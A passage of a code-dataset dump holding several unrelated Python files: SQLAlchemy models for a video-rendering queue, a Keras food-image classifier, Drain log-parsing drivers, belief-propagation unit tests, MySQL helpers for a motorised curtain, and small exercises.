game_id,num_players,score,variant,*current_players=row.strip().split(',')\r\n if num_players != k:\r\n for teammate in current_players:\r\n if teammate == player:\r\n continue\r\n if teammate not in freq:\r\n freq[teammate] = 0\r\n freq[teammate] += 1\r\n\r\nfreq = convertDictToList(freq)\r\nfreq = sortBySecond(freq)\r\n\r\noutput = open('output/frequent_teammates/frequent_teammates_excluding_%s_players_%s.csv'%(k,player), 'w')\r\noutput.write('\\n'.join([','.join(stringify(flatten(i))) for i in freq]))\r\noutput.close()","sub_path":"frequent_teammates_excluding_k_players.py","file_name":"frequent_teammates_excluding_k_players.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"258707505","text":"# -*- coding: utf-8 -*-\n\nfrom 
datetime import datetime\nfrom decimal import Decimal\n\nfrom sqlalchemy import (Column, Text, BigInteger, DateTime, ForeignKey,\n Boolean, Numeric, Integer, inspect)\nfrom sqlalchemy.dialects.postgresql import JSON\nfrom sqlalchemy.sql import functions\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy.orm.attributes import InstrumentedAttribute\nfrom sqlalchemy.ext.declarative import declarative_base\n\nfrom swic.app import app\n\nBase = declarative_base()\n\n\nclass BaseORM(Base):\n __abstract__ = True\n\n def __init__(self, **kwargs):\n for key, value in kwargs.iteritems():\n setattr(self, key, value)\n\n def dict(self):\n retval = {}\n klasses = list(self.__class__.__mro__)\n klasses.reverse()\n for klass in klasses:\n for attr in klass.__dict__:\n if isinstance(getattr(klass, attr), InstrumentedAttribute):\n # Only allow JSON serializable values\n value = getattr(self, attr)\n if type(value) in [unicode, str, int, float, bool]:\n retval[attr] = value\n if type(value) == datetime:\n retval[attr] = value.isoformat()\n if isinstance(value, Decimal):\n retval[attr] = value\n return retval\n\n def append(self, other, **kwargs):\n \"\"\"Appends N-to-N related objects\"\"\"\n self_attr = self.__class__.__name__.lower().replace('swic', '')\n other_attr = other.__class__.__name__.lower().replace('swic', '')\n keys = {\n self_attr: self,\n other_attr: other,\n }\n\n store = inspect(self).session\n Mapper = getattr(self.__class__, other_attr + '_map').prop.argument()\n mapper = Mapper.get_or_create(store, keys, **kwargs)\n return getattr(self, other_attr + '_map').append(mapper)\n\n\n @classmethod\n def get_or_create(cls, store, query, **kwargs):\n # Auto assign query parameters when creating/updating\n kwargs.update(query)\n\n obj = store.query(cls).filter_by(**query).first()\n if obj is not None:\n for key, value in kwargs.iteritems():\n setattr(obj, key, value)\n return obj\n obj = cls(**kwargs)\n store.add(obj)\n return obj\n\n\nclass SWICUserVideoMap(BaseORM):\n \"\"\"Association between SWICUser and Video\"\"\"\n\n __tablename__ = 'swic_user_video_map'\n\n video_id = Column(BigInteger,\n ForeignKey('video.id'),\n primary_key=True)\n video = relationship('Video', back_populates='user_map')\n\n swic_user_id = Column(BigInteger,\n ForeignKey('swic_user.id'),\n primary_key=True)\n user = relationship('SWICUser', back_populates='video_map')\n\n created_on = Column(DateTime, default=datetime.now)\n\n ip = Column(Text)\n\n\nclass Video(BaseORM):\n \"\"\"A video that was requested\"\"\"\n\n __tablename__ = 'video'\n\n #: Synthetic id\n id = Column(BigInteger, primary_key=True)\n\n #: The video request's Firebase code\n code = Column(Text)\n\n #: The video request's creation date\n created_on = Column(DateTime, default=datetime.now)\n\n #: Whether the video comes from a donator or not\n donator = Column(Boolean, default=False)\n\n #: How much time should we slow the original video to render\n rendering_slowness = Column(Numeric, default=20)\n\n #: The video request's rendering date\n rendered_on = Column(DateTime)\n\n #: Has the video rendering failed?\n failed = Column(Boolean, default=False)\n\n #: The video's rendering resolution\n resolution_width = Column(Integer, default=1280)\n resolution_height = Column(Integer, default=720)\n\n #: User mapping\n user_map = relationship('SWICUserVideoMap', back_populates=\"video\")\n\n #\n # Static\n #\n\n @classmethod\n def get_queue(cls, store):\n query = store.find(cls, rendered_on=None)\n return query.order_by(~cls.donator, cls.created_on)\n\n 
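# usage sketch (illustrative only; assumes a live SQLAlchemy session in `store`,\n    # and 'abc123' is a made-up code value): get_or_create() defined on BaseORM above\n    # is an upsert idiom - it filters by the query dict and only adds a new row when\n    # nothing matches:\n    #\n    #     video = Video.get_or_create(store, {'code': 'abc123'}, donator=True)\n    #     store.commit()\n    #\n    # every kwarg (query keys included) is re-assigned on the returned object, so\n    # repeated calls behave as an idempotent update.\n\n    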
@classmethod\n def rendering_eta(cls):\n rendering_seconds = app.config['RENDERING_SECONDS']\n video_seconds = app.config['VIDEO_SECONDS']\n return (cls.rendering_slowness * video_seconds) + rendering_seconds\n\n @classmethod\n def get_eta(cls, store):\n attr = functions.sum(Video.rendering_eta())\n return store.find(attr).filter(cls.rendered_on == None).one()[0] or 0\n\n #\n # Properties\n #\n\n @property\n def rendering_time(self):\n rendering_seconds = app.config['RENDERING_SECONDS']\n video_seconds = app.config['VIDEO_SECONDS']\n return (self.rendering_slowness * video_seconds) + rendering_seconds\n\n @property\n def eta(self):\n store = inspect(self).session\n attr = functions.sum(Video.rendering_eta())\n\n if self.donator:\n filter = Video.donator & (Video.created_on <= self.created_on)\n else:\n filter = Video.donator | (Video.created_on <= self.created_on)\n query = store.query(attr).filter(Video.rendered_on == None)\n return query.filter(filter).one()[0] or 0\n\n #\n # Public\n #\n\n def dict(self, eta=True, users=False):\n retval = super(Video, self).dict()\n retval['rendering_time'] = self.rendering_time\n if eta:\n retval['eta'] = self.eta\n if users:\n retval['users'] = [m.user.dict() for m in self.user_map]\n return retval\n\n\nclass SWICUser(BaseORM):\n \"\"\"Someone who requested a video\"\"\"\n\n __tablename__ = 'swic_user'\n\n #: Synthetic id\n id = Column(BigInteger, primary_key=True)\n\n #: The user's creation date\n created_on = Column(DateTime, default=datetime.now)\n\n #: The user's e-mail\n email = Column(Text)\n\n #: Video mapping\n video_map = relationship('SWICUserVideoMap', back_populates=\"user\")\n\n\nclass Event(BaseORM):\n \"\"\"Generic event table\"\"\"\n\n types = {\n 'SERVER_RESTARTED': 'server-restarted',\n 'DATABASE_CREATED': 'database-created',\n 'VIDEO_STATUS_CHECK': 'video-status-check',\n }\n\n __tablename__ = 'event'\n\n #: Synthetic id\n id = Column(BigInteger, primary_key=True)\n\n #: The event's creation date\n created_on = Column(DateTime, default=datetime.now)\n\n #: The event's type\n type = Column(Text)\n\n #: The event's additional data\n data = Column(JSON)\n\n def __init__(self, type, data=None):\n self.type = self.types[type]\n self.data = data\n","sub_path":"swic/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"630595411","text":"import argparse\n\nparser = argparse.ArgumentParser('Classify food images')\nparser.add_argument('--dir', type=str, required=True, help='Directory of images')\nparser.add_argument('--model', type=str, required=True, help='Path to model')\n\nargs = parser.parse_args()\n\nimage_DIR = args.dir\nmodel_DIR = args.model\n\nimport os \nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.models import load_model\n\nfiles_in_dir = os.listdir(image_DIR)\nimage_formats = ['.jpg', '.jpeg', '.png', 'JPEG', '.PNG', '.JPG']\n\nprint('Reading images...')\n\nimage_paths = []\nfor file in files_in_dir:\n for image_format in image_formats:\n if image_format in file:\n image_paths.append(image_DIR + '/' + file)\n \nX = []\nfor image in image_paths:\n img = plt.imread(image)\n X.append(img)\nX = np.array(X)\nX = X/255\n\nprint('Loading model...')\n\nmodel = load_model(model_DIR)\n\nprint('Running model on images...')\n\ny = model.predict(X)\n\nprint('Images classified...')\n\nthreshold = 0.37\n\ny_copy = np.copy(y)\ny_copy[y_copy < threshold] = 
0\ny_copy[y_copy >= threshold] = 1\n\nclasses_ = np.array(['apple', 'banana', 'bread', 'bruscitt', 'cake', 'carrot', 'cutlet',\n       'fennel_gratin', 'fillet_fish', 'fries', 'green_beans',\n       'lasagna_bolognese', 'meat', 'orange', 'pasta', 'pears', 'peas',\n       'pizza', 'pizzoccheri', 'potatoes', 'pudding', 'rice', 'salad',\n       'salmon', 'salty_cake', 'savory_pie', 'scallops', 'soup',\n       'spinach', 'squid_stew', 'tangerine', 'wet_zucchini', 'yogurt'])\n\nclassified_labels = []\nfor i in range(len(y_copy)):\n    classified_labels.append(str(classes_[(y_copy == 1)[i]]))\n\nprint('Saving Results...')\n    \nresult = pd.DataFrame(classified_labels).rename(columns={0:'labels'})\n\n# str.strip() removes a character *set* from both ends, not a prefix/suffix, so use path helpers to get the bare file name\nimage_names = pd.Series(image_paths, name='image').apply(lambda x: os.path.splitext(os.path.basename(x))[0])\n\nresult = pd.concat([image_names, result], axis=1)\n\nresult.to_csv(image_DIR + '/result.csv', index=False)\n\nprint('Results saved at {}'.format(image_DIR + '/result.csv'))","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"411298070","text":"from model import Node,Drain,buildSampleDrain\n# from optimizer import Optimizer\nfrom optimizer import Optimizer\nfrom plotter import createPlot\nfrom partition import Preprocess\nimport pandas as pd\nimport os\n\n\ndef parse_log_data():\n    rex = ['blk_(|-)[0-9]+', '(/|)([0-9]+\\\.){3}[0-9]+(:[0-9]+|)(:|)']\n    removeCol = [0,1,2]\n    myParser = Drain(rex=rex,removeCol=removeCol)\n    # myParser.fit(inputFile='./sample.log',outputFile='test.csv')\n    myParser.fit(isReconstruct=True)\n    return myParser\n    # myParser.save()\n\ndef printClusters(logClusters):\n    for logCluster in logClusters:\n        print(\"eventId: \"+str(logCluster.eventId)+\" template: \"+' '.join(logCluster.logTemplate),end=' ')\n        print(\"parentNode: \" ,end=' ')\n        for node in logCluster.parentNode:\n            print(node.token,end=' ')\n        print()\n\ndef optimize_by_seq_dist():\n    logPath = os.path.join(os.path.abspath(''), 'sample.log')\n    drain = buildSampleDrain(logPath)\n    drain.save()\n    logClusters = drain.logClusters\n    printClusters(logClusters)\n    opt = Optimizer()\n    opt.modify(method = 'seq_dist',tree = drain.prefixTree,drain=drain,st = 0.7)\n    logClusters = drain.logClusters\n    printClusters(logClusters)\n    root = drain.copy()\n    createPlot(root)\n\ndef optimize_by_merge_sub_tree():\n\n    drain = parse_log_data()\n    # logPath = os.path.join(os.path.abspath(''), 'sample.log')\n    # drain = buildSampleDrain(logPath)\n    # createPlot(drain)\n    opt = Optimizer()\n    logClusters = drain.logClusters\n    print('before optimization')\n    printClusters(logClusters)\n    opt.modify(method='merge_sub_tree', tree=drain.prefixTree,drain = drain)\n    logClusters = drain.logClusters\n    print('merge sub-tree optimization')\n    printClusters(logClusters)\n    # createPlot(drain)\n    opt.modify(method = 'seq_dist',tree = drain.prefixTree,drain=drain,st = 0.8)\n    logClusters = drain.logClusters\n    print('merge cluster optimization')\n    printClusters(logClusters)\n    drain.save()\n    return drain\n\ndef optimize_by_tfidf():\n    logPath = os.path.join(os.path.abspath(''), 'sample.log')\n    drain = buildSampleDrain(logPath)\n    logClusters = drain.logClusters\n    printClusters(logClusters)\n    opt = Optimizer()\n    opt.modify(method = 'tfidf',tree = drain.prefixTree,drain=drain,st = 0.6)\n    logClusters = drain.logClusters\n    print( )\n    printClusters(logClusters)\n    root = drain.copy()\n    createPlot(root)\n\n\ndef draw_tree():\n    rex = ['blk_(|-)[0-9]+', '(/|)([0-9]+\\\.){3}[0-9]+(:[0-9]+|)(:|)']\n    removeCol = [0, 1, 2]\n    
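# quick illustration of the rex masking (the sample tokens below are made up):\n    # these two patterns pre-mask variable fields before template mining, e.g.\n    #   re.search(rex[0], 'blk_-1608999687')      # HDFS block id -> match\n    #   re.search(rex[1], '10.250.19.102:50010')  # ip:port token -> match\n    # so such values collapse into wildcards instead of spawning one template each.\n    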
myParser = Drain(rex=rex, depth=3, removeCol=removeCol)\n    root = myParser.load('./results/prefixTree.pkl')\n    createPlot(root)\n\nif __name__ == \"__main__\":\n    # draw_tree()\n    drain = parse_log_data()\n    drain.save()\n    # preprocess = Preprocess('./results/','./data/', \"log_item_to_label.csv\", 'data_instances_hdfs.csv', 'anormaly_label.csv', 'normal.csv', 'abnormaly.csv')\n    # blockId_to_logs = preprocess.partition_by_file()\n    # data_df = pd.read_csv(\"./results/data_instances_hdfs.csv\", index_col=0,engine='c', na_filter=False, memory_map=True)\n    # preprocess.map_log_seq_to_label(data_df)","sub_path":"end_to_end/drain/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"162285619","text":"\"\"\"\nFind the k largest elements in a BST\n\nA BST is a sorted data structure, which suggests that it should be possible to find\nthe k largest keys easily.\n\nThis is a reverse inorder traversal, so keys are visited in descending order.\nThis is easy to do with a closure.\n\"\"\"\n\nk_ = 0\nres_ = []\ndef largest_k(r, k):\n    global k_\n    if not r:\n        return\n    largest_k(r.right, k)  # larger keys live in the right subtree, so visit it first\n    if k_ < k:\n        res_.append(r)\n        k_ += 1\n    else:\n        return\n    largest_k(r.left, k)\n\n\"\"\"\nLESSON: When you use a data structure, use its attributes like size() to do\nthe accounting for you\n\ntemplate <typename T>\nvoid find_k_largest_in_BST_helper(const shared_ptr<BSTNode<T>> &r,\n                                  const int &k, vector<T> &k_elements) {\n  // perform reverse inorder traversal\n  if (r && k_elements.size() < k) {\n    find_k_largest_in_BST_helper(r->right, k, k_elements);\n    if (k_elements.size() < k) {\n      k_elements.emplace_back(r->data);\n      find_k_largest_in_BST_helper(r->left, k, k_elements);\n    }\n  }\n}\n\ntemplate <typename T>\nvector<T> find_k_largest_in_BST(const shared_ptr<BSTNode<T>> &root,\n                                const int &k) {\n  vector<T> k_elements;\n  find_k_largest_in_BST_helper(root, k, k_elements);\n  return k_elements;\n}\n\"\"\"","sub_path":"interview/elementsofpi/ch14/14.11.py","file_name":"14.11.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"330464073","text":"\"\"\"Test class for matrix implementation of tree-reweighted belief propagator\"\"\"\nimport unittest\nfrom mrftools import *\nimport numpy as np\n\n\nclass TestMatrixTreeBeliefPropagator(unittest.TestCase):\n    \"\"\"Test class for matrix implementation of tree-reweighted belief propagator\"\"\"\n    def create_chain_model(self):\n        \"\"\"Create chain-structured MRF with different variable cardinalities.\"\"\"\n        mn = MarkovNet()\n\n        np.random.seed(1)\n\n        k = [4, 3, 6, 2, 5]\n\n        mn.set_unary_factor(0, np.random.randn(k[0]))\n        mn.set_unary_factor(1, np.random.randn(k[1]))\n        mn.set_unary_factor(2, np.random.randn(k[2]))\n        mn.set_unary_factor(3, np.random.randn(k[3]))\n\n        factor4 = np.random.randn(k[4])\n        factor4[2] = -float('inf')\n\n        mn.set_unary_factor(4, factor4)\n\n        mn.set_edge_factor((0, 1), np.random.randn(k[0], k[1]))\n        mn.set_edge_factor((1, 2), np.random.randn(k[1], k[2]))\n        mn.set_edge_factor((2, 3), np.random.randn(k[2], k[3]))\n        mn.set_edge_factor((3, 4), np.random.randn(k[3], k[4]))\n        mn.create_matrices()\n\n        return mn\n\n    def create_loop_model(self):\n        \"\"\"Create loop-structured MRF with different variable cardinalities.\"\"\"\n        mn = self.create_chain_model()\n\n        k = [4, 3, 6, 2, 5]\n\n        mn.set_edge_factor((3, 0), np.random.randn(k[3], k[0]))\n        mn.create_matrices()\n        return mn\n\n    def test_comparison_to_slow_trbp(self):\n        \"\"\"Test that matrix TRBP infers the same 
marginals as loop-based TRBP\"\"\"\n mn = self.create_loop_model()\n\n probs = {(0, 1): 0.75, (1, 2): 0.75, (2, 3): 0.75, (0, 3): 0.75, (3, 4): 1.0}\n\n trbp_mat = MatrixTRBeliefPropagator(mn, probs)\n trbp_mat.infer(display='final')\n trbp_mat.load_beliefs()\n\n trbp = TreeReweightedBeliefPropagator(mn, probs)\n trbp.infer(display='final')\n trbp.compute_pairwise_beliefs()\n trbp.compute_beliefs()\n\n for i in mn.variables:\n print (\"Slow TRBP unary marginal of %d: %s\" % (i, repr(np.exp(trbp.var_beliefs[i]))))\n print (\"Matrix TRBP unary marginal of %d: %s\" % (i, repr(np.exp(trbp_mat.var_beliefs[i]))))\n assert np.allclose(np.exp(trbp.var_beliefs[i]), np.exp(trbp_mat.var_beliefs[i])), \"unary beliefs don't match\"\n\n print (\"Slow TRBP pairwise marginal: \" + repr(np.exp(trbp.pair_beliefs[(0, 1)])))\n print (\"Matrix TRBP pairwise marginal: \" + repr(np.exp(trbp_mat.pair_beliefs[(0, 1)])))\n\n assert np.allclose(trbp.pair_beliefs[(0, 1)], trbp_mat.pair_beliefs[(0, 1)]), \"Pair beliefs don't match: \" + \\\n \"\\nTRBP:\" + repr(np.exp(trbp.pair_beliefs[(0, 1)])) + \"\\nMatTRBP:\" + repr(np.exp(trbp_mat.pair_beliefs[(0, 1)]))\n\n print (\"TRBP matrix energy functional: %f\" % trbp_mat.compute_energy_functional())\n print (\"TRBP slow energy functional: %f\" % trbp.compute_energy_functional())\n\n assert np.allclose(trbp_mat.compute_energy_functional(), trbp.compute_energy_functional()), \\\n \"Energy functional is not exact. Slow TRBP: %f, Matrix TRBP: %f\" % (trbp.compute_energy_functional(),\n trbp_mat.compute_energy_functional())\n\n def test_tree_structured_model(self):\n \"\"\"Test that TRBP infers the true marginals on tree-structured MRF.\"\"\"\n mn = MarkovNet()\n\n # np.random.seed(1)\n\n k = [4, 3, 6, 2]\n # k = [4, 4, 4, 4]\n\n mn.set_unary_factor(0, np.random.randn(k[0]))\n mn.set_unary_factor(1, np.random.randn(k[1]))\n mn.set_unary_factor(2, np.random.randn(k[2]))\n mn.set_unary_factor(3, np.random.randn(k[3]))\n\n mn.set_edge_factor((0, 1), np.random.randn(k[0], k[1]))\n mn.set_edge_factor((1, 2), np.random.randn(k[1], k[2]))\n mn.set_edge_factor((3, 2), np.random.randn(k[3], k[2]))\n\n print(\"Neighbors of 0: \" + repr(mn.get_neighbors(0)))\n print(\"Neighbors of 1: \" + repr(mn.get_neighbors(1)))\n\n edge_probabilities = dict()\n\n for edge in mn.edge_potentials:\n edge_probabilities[edge] = 1 # BP\n\n trbp = MatrixTRBeliefPropagator(mn, edge_probabilities)\n\n trbp.infer(display='full')\n trbp.load_beliefs()\n\n trbp.compute_pairwise_beliefs()\n\n bf = BruteForce(mn)\n\n for i in range(2):\n print (\"Brute force unary marginal of %d: %s\" % (i, repr(bf.unary_marginal(i))))\n print (\"TRBP unary marginal of %d: %s\" % (i, repr(np.exp(trbp.var_beliefs[i]))))\n assert np.allclose(bf.unary_marginal(i), np.exp(trbp.var_beliefs[i])), \"TRBP not close to true unary\"\n\n print (\"Brute force pairwise marginal: \" + repr(bf.pairwise_marginal(0, 1)))\n print (\"TRBP pairwise marginal: \" + repr(np.exp(trbp.pair_beliefs[(0, 1)])))\n\n assert np.allclose(bf.pairwise_marginal(0, 1), np.exp(trbp.pair_beliefs[(0, 1)])), \\\n \"TRBP not close to pair marginal\"\n\n print (\"Tree Bethe energy functional: %f\" % trbp.compute_energy_functional())\n print (\"Brute force log partition function: %f\" % np.log(bf.compute_z()))\n\n assert np.allclose(trbp.compute_energy_functional(), np.log(bf.compute_z()))\n\n def test_upper_bound(self):\n \"\"\"Test that TRBP provides an upper bound on the true log-partition function.\"\"\"\n trials = 5\n\n tr_diff = np.zeros(trials)\n bp_diff = 
np.zeros(trials)\n\n for trial in range(trials):\n\n mn = MarkovNet()\n\n width = 3\n height = 3\n\n k = 2\n\n for x in range(width):\n for y in range(height):\n mn.set_unary_factor((x, y), np.random.random(k))\n\n for x in range(width - 1):\n for y in range(height - 1):\n mn.set_edge_factor(((x, y), (x + 1, y)), np.random.random((k, k)))\n mn.set_edge_factor(((y, x), (y, x + 1)), np.random.random((k, k)))\n\n bf = BruteForce(mn)\n\n edge_probabilities = dict()\n\n for edge in mn.edge_potentials:\n edge_probabilities[edge] = 0.5\n\n interior_prob = 0.5\n border_prob = 0.75\n\n for x in range(width):\n edge_probabilities[(x, 0)] = interior_prob\n edge_probabilities[(x, height - 1)] = interior_prob\n\n for y in range(height):\n edge_probabilities[(0, y)] = border_prob\n edge_probabilities[(width - 1, y)] = border_prob\n\n trbp = MatrixTRBeliefPropagator(mn, edge_probabilities)\n trbp.infer(display='off')\n\n trbp_z = trbp.compute_energy_functional()\n true_z = np.log(bf.compute_z())\n\n print(\"Tree Bethe energy functional: %f\" % trbp_z)\n print(\"Brute force log partition function: %f\" % true_z)\n\n print(\"Is the TRBP energy functional an upper bound? %r\" %\n (trbp_z >= true_z))\n assert trbp_z >= true_z, \"TRBP energy functional was lower than true log partition\"\n\n tr_diff[trial] = trbp_z - true_z\n\n print(\"Difference range between variational Z and truth:\")\n print(\"TRBP: %f to %f\" % (min(tr_diff[:trial + 1]), max(tr_diff[:trial + 1])))\n print(\"Average error. TRBP: %f\" % np.mean(np.abs(tr_diff[:trial + 1])))\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_matrix_trbp.py","file_name":"test_matrix_trbp.py","file_ext":"py","file_size_in_byte":7447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"587755923","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n__author__ = \"MPZinke\"\n\n###########################################################################\n#\n#\tcreated by: MPZinke\n#\ton ..\n#\n#\tDESCRIPTION: Function library to pull from curtain.sql to get/set values & events.\n#\t\t\t\t\t\t`curtain_details` table should contain 1 entry for storing primary curtain\n#\t\t\t\t\t\tdata.\n#\tBUGS:\n#\tFUTURE:\n#\n###########################################################################\n\nfrom Definitions import *\nimport ErrorWriter\n\n\n# —————————————————— GETTERS ——————————————————\n\ndef current_position(cursor):\n\tquery = (\t\"SELECT `curtain_position` FROM `curtain_details` \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query)\n\treturn cursor._rows[0][0]\n\n\n# get number of stepper motor steps from one side of the curtain to the other (open vs closed)\ndef curtain_length(cursor):\n\tquery = (\t\"SELECT `curtain_length` FROM `curtain_details` \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query)\n\treturn cursor._rows[0][0]\n\n\n# bool for if the curtain's desired position is current catalogued position \ndef desire_position_does_not_equal_current(cursor, desired):\n\tquery = (\t\"SELECT `curtain_position`FROM `curtain_details` \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query)\n\tcurrent = cursor._rows[0][0]\n\tif not current: return 5 < desired\n\treturn 5 < (abs(current - desired) / current)\n\n\ndef direction(cursor):\n\tquery = (\t\"SELECT `curtain_direction` FROM `curtain_details` \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query)\n\treturn cursor._rows[0][0]\n\n\n# BOOL/INT: check for practical purposes if an event 
(same position) is already set\ndef event_set_at_approximate_time(cursor, event, time):\n\tfrom datetime import timedelta\n\ttime_lower_bound = time - timedelta(seconds=SAME_EVENT_TIME_DIFFERENCE)\n\ttime_upper_bound = time + timedelta(seconds=SAME_EVENT_TIME_DIFFERENCE)\n\tquery = (\t\"SELECT * FROM `events` \\\n\t\t\t\tWHERE `event_time` > '%s' AND `event_time` < '%s' \\\n\t\t\t\tAND `event_position` = '%d';\")\n\tcursor.execute(query % (\ttime_lower_bound,\n\t\t\t\t\t\t\t\ttime_upper_bound,\n\t\t\t\t\t\t\t\tevent))\n\treturn cursor.rowcount\n\n\n# —————————————————— OPTIONS ——————————————————\n\ndef adafruit_feed(cursor):\n\tquery = (\t\"SELECT `adafruit_feed` FROM `options` \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query)\n\treturn cursor._rows[0][0]\n\n\ndef auto_calibration(cursor):\n\tquery = (\t\"SELECT `auto_calibration` FROM `options` \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query)\n\treturn cursor._rows[0][0]\n\n\ndef event_predictor(cursor):\n\tquery = (\t\"SELECT `event_predictor` FROM `options` \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query)\n\treturn cursor._rows[0][0]\n\n\ndef sunrise_open(cursor):\n\tquery = (\t\"SELECT `sunrise_open` FROM `options` \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query)\n\treturn cursor._rows[0][0]\n\n\ndef sunset_close(cursor):\n\tquery = (\t\"SELECT `sunset_close` FROM `options` \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query)\n\treturn cursor._rows[0][0]\n\n\n# —————————————————— EVENTS ——————————————————\n\ndef all_non_activated_events(cursor):\n\tquery = (\t\"SELECT `event_key`, `event_position` FROM `events` \\\n\t\t\t\tWHERE `event_time` < CURRENT_TIMESTAMP \\\n\t\t\t\tAND `event_activated` = FALSE \\\n\t\t\t\tORDER BY `event_time` DESC;\")\n\tcursor.execute(query)\n\treturn cursor._rows\n\n\ndef events_for_previous_weeks(cursor):\n\tfrom datetime import datetime, timedelta\n\toldest_desired_date = datetime.now() - timedelta(weeks=CLUSTER_SPAN)\n\tquery = (\t\"SELECT `event_position`, `event_time` FROM `events` \\\n\t\t\t\tWHERE `event_time` > '%s' AND `event_time` < CURRENT_TIMESTAMP\")\n\tcursor.execute(query % (str(oldest_desired_date)))\n\treturn cursor._rows\n\n\ndef newest_non_activated_event(cursor):\n\tquery = (\t\"SELECT `event_key`, `event_position` FROM `events` \\\n\t\t\t\tWHERE `event_time` < CURRENT_TIMESTAMP \\\n\t\t\t\tAND `event_activated` = FALSE \\\n\t\t\t\tORDER BY `event_time` DESC LIMIT 1;\")\n\tcursor.execute(query)\n\treturn cursor._rows[0]\n\n\ndef oldest_non_activated_event(cursor):\n\tquery = (\t\"SELECT `event_key`, `event_position` FROM `events` \\\n\t\t\t\tWHERE `event_time` < CURRENT_TIMESTAMP \\\n\t\t\t\tAND `event_activated` = FALSE \\\n\t\t\t\tORDER BY `event_time` ASC LIMIT 1;\")\n\tcursor.execute(query)\n\treturn cursor._rows[0]\n\n\n# —————————————————— SETTERS ——————————————————\n\n# move to DBFunctions.py\ndef add_event(cnx, cursor, event_position, time):\n\tquery = (\t\"INSERT INTO `events` \\\n\t\t\t\t(`event_position`, `event_activated`, `event_time`) VALUES \\\n\t\t\t\t('%d', FALSE, '%s');\")\n\tcursor.execute(query % (event_position, time.strftime(DATETIME_STRING_FORMAT)))\n\treturn cnx.commit()\n\n\ndef mark_event_as_activated(cnx, cursor, event_key):\n\tquery = (\t\"UPDATE `events` SET `event_activated` = TRUE \\\n\t\t\t\tWHERE `event_key` = '%d';\")\n\tcursor.execute(query % (event_key))\n\treturn cnx.commit()\n\n\n# assign the curtain's current position to `curtain_details`.`curtain_position` in DB\ndef 
new_position(cnx, cursor, position_in_steps):\n\tquery = (\t\"UPDATE `curtain_details` SET `curtain_position` = '%d' \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query % (position_in_steps))\n\treturn cnx.commit()\n\n\ndef set_current_position(cnx, cursor, position):\n\tquery = (\t\"UPDATE `curtain_details` SET `curtain_position` = '%d' \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query % (position))\n\treturn cnx.commit() \n\n\ndef set_curtain_length(cnx, cursor, total_steps):\n\tquery = (\t\"UPDATE `curtain_details` SET `curtain_length` = '%d' \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query % (total_steps))\n\treturn cnx.commit() \n\n\ndef set_direction_switch(cnx, cursor, switch_value):\n\tquery = (\t\"UPDATE `curtain_details` SET `curtain_direction` = '%d' \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query % (switch_value))\n\treturn cnx.commit() \n\n\ndef write_curtain_error(cnx, cursor, current, desired, error, module=None):\n\tif not module:\n\t\timport traceback\n\t\tmodule = traceback.format_exc().split(\"\\n\")[-4].strip()\n\n\t# change delimiter if exists\n\terror_message = str(error).replace(DELIMITER, ',' if ',' is not DELIMITER else ' ')\n\tquery = (\t\"INSERT INTO `error_log` \\\n\t\t\t\t(`curtain_position`, `event_position`, `error`, `path`) VALUES \\\n\t\t\t\t('%d', '%d', '%s', '%s');\")\n\tcursor.execute(query % (current, desired, error, module))\n\treturn cnx.commit()\n\n\n# ———————————————— CONNECTION —————————————————\n# ————————————————————————————————————————\n\ndef start_connection():\n\ttry:\n\t\timport mysql.connector\n\t\tcnx = mysql.connector.connect(\tuser=DB_USER, password=DB_PASSWD,\n\t\t\t\t\t\t host=DB_IP, port=DB_PORT,\n\t\t\t\t\t\t database=DB_NAME)\n\t\treturn cnx\n\texcept Exception as error:\n\t\tErrorWriter.write_error(error)\n\t\treturn None\n\n\ndef connect_to_DB():\n\tcnx = start_connection()\n\twhile is_null_sleep_then(cnx):\n\t\tcnx = start_connection() # connect\n\tcursor = cnx.cursor(buffered=True)\n\treturn cnx, cursor","sub_path":"DatabasePortal/Python/IndividualRPi/DBFunctions.py","file_name":"DBFunctions.py","file_ext":"py","file_size_in_byte":7231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"264223840","text":"# -*- coding: utf-8 -*-\nfrom pymongo import MongoClient\nfrom nltk.corpus import stopwords\nimport re\n\nclient = MongoClient('localhost', 27017)\ndb=client.MinorProject\n\ndef processTweet(text):\n #text = re.sub(r'^http?:\\/\\/.*[\\r\\n]*', '', text, flags=re.MULTILINE)\n text=text.lower()\n stop = stopwords.words('english')\n stop.extend(['rt'])\n a= [i for i in text.split() if i not in stop and \"@\" not in i]\n a=[re.sub(r'http?:\\/\\/.*[\\r\\n]*', 